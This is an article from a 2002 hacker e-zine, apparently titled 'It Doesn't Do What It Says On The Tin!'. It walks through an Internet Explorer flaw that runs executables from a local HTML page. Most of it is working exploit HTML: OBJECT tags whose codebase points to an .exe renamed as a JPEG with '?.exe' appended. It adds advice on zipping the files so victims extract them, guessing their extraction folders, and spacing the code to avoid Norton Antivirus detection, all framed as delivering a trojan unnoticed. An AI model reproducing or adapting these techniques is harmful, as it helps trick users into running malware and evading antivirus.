³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij
                                +-+-+-+-+-+-+-+-+
         ÛÛÛÛÛÛÛÛÛ²²²²²±±±±±°°°ð|O|u|t|b|r|e|a|k|ð°°°±±±±±²²²²²ÛÛÛÛÛÛÛ
                                +-+-+-+-+-+-+-+-+
                            Issue #4 - Page 11 of 12 
        ³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij

It Doesn't Do What It Says On The Tin!
======================================

#include "the usual disclaimers.h" /* (please e-mail the author for a copy of
the disclaimers) */

Someone kindly discovered a little loop hole that allows you to run .exe files
from within an HTML page. With all the latest patches at the time of writing
this article, Internet Explorer is now limited to only having this flaw when the
HTML file is opened from the local hard drive.

Here's a small example (note that the formatting here is specially done so that
Norton Antivirus doesn't delete this article like it was doing on one of my
previous ones). Copy and paste the following into an HTML page and open it in
Internet Explorer. It should start the Calculator if you're using Windows NT, 
2000 or XP.


<html>
   <object id = "o"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/winnt/system32/calc.exe"
      height=0
      width=0
   </object>
</html>


The first issue we have with this is that we have to hard code the entire path
to the .exe file. So on Windows 95/98/Me the above would fail. But with a slight
modification we can make it work on all version of Windows. Like this...


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/winnt/system32/calc.exe"
      height=0
      width=0
   </object>
   <object id = "o2"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/windows/calc.exe"
      height=0
      width=0
   </object>
</html>


What I've done is make it try both directories, and the correct one will run,
and the other won't.

The second issue is that this is pretty boring. You can't pass command line
parameters to the program you're trying to run using this technique. So anything
that you run will probably not do anything harmful, or will at least prompt the
user first. The most damage you could do is fill up memory and desktop space
with an annoying high amount of applications, and may cause the computer to
crash from the overload.

If you're trying to give someone a trojan (trojan debates are banned!), they
will spot your .exe file a mile away. So, the third issue you'll encounter is
trying to send someone your HTML file with an .exe file without them getting a
slight bit suspicious.

So, I played around a bit more and came up with a new trick that allowed me to
run the .exe file no matter what its file name was! Soon I will explain how.

Firstly, copy your calc.exe file to a file named example.jpg and put it into a
folder of its own, eg. C:\workbench. Create an HTML file in the same folder
called example.html which contains the following HTML code:


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/workbench/example.jpg"
      height=0
      width=0
   </object>
</html>


Now, when you open the HTML file it currently FAILS to run the "example.jpg"
file (which is really calc.exe with a different name, remember?). So I
discovered that if you add a URL-type parameter "?.exe" to the file path then
the browser thinks we're dealing with an .exe (lazy coders), but when the URL
is actually parsed again for running the file, only the file name up to before
the question mark is used. The remaining characters are discarded as they are
assumed to be parameters as per correct URL formatting. The following will now
work:


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/workbench/example.jpg?.exe"
      height=0
      width=0
   </object>
</html>


This little coding oversight allows us to name the file whatever we like. I
chose to use a JPEG file because you'd typically expect it to contain a whole
lot of binary data - similar to what an .exe file might look like to the
untrained eye - and that an HTML file will probably be accompanied by a JPEG or
two. Most users will go to open the HTML file first to get the full effect
before ever trying to open individual JPEGs. Besides, if they try to view the
JPEG they will just get invalid file format errors, so they may be none the
wiser about what it really is.

The fourth issue you'll encounter is how do you get someone to open the
HTML file locally? Simple. Zip up the two files. When they receive the zip file
they have to extract the contents to the local hard drive before viewing them.

The fifth issue you'll encounter now is guessing the directory they're going to
unzip the files to. This is because we have to specify a complete path to the
".exe" file.

So take what we did before and create objects that point to any kinds of folders
you think a user might use on various operating systems. Here are a few examples
to give you the idea:


<html>
   <object id = "o1"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/mirc/downloads/example.jpg?.exe"
      height=0
      width=0
   </object>
   <object id = "o2"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = "c:/temp/example.jpg?.exe"
      height=0
      width=0
   </object>
   <object id = "o3"
      classid = "clsid:11111111-1111-1111-1111-111111111111"
      codebase = 
  "c:/Documents and Settings/Administrator/Local Settings/Temp/example.jpg?.exe"
      height=0
      width=0
   </object>
   
   <!-- you could on for ages trying many different folders -->
   
   <!-- You might even try putting in some real HTML content in the page too
      so the user is not suspicious at the outset -->
</html>


Note that we give the object a new name each time. We don't want any unexpected
errors to stop us of course.

Remember to keep the spacing around the equals signs ("=") because Norton
Antivirus will stop you dead in your tracks if you don't.

This was just a fun experiment. Don't use it to create havoc! That's naughty
and bad and wastes system administrators' time and companies' money. However,
you can use this against Osamu Bin Laden if you see him online.

Well, that's all from me for now. I look forward to the next time.

- Timeless
2002-04-18

PS. Greetz to all at #hackerzlair and #outbreakzine on DalNet, and to all my
friends (you already know who you are).

PPS. How to view an HTML file from now on... um, lol, DON'T! It doesn't really
leave you with a warm fuzzy feeling does it?

</article>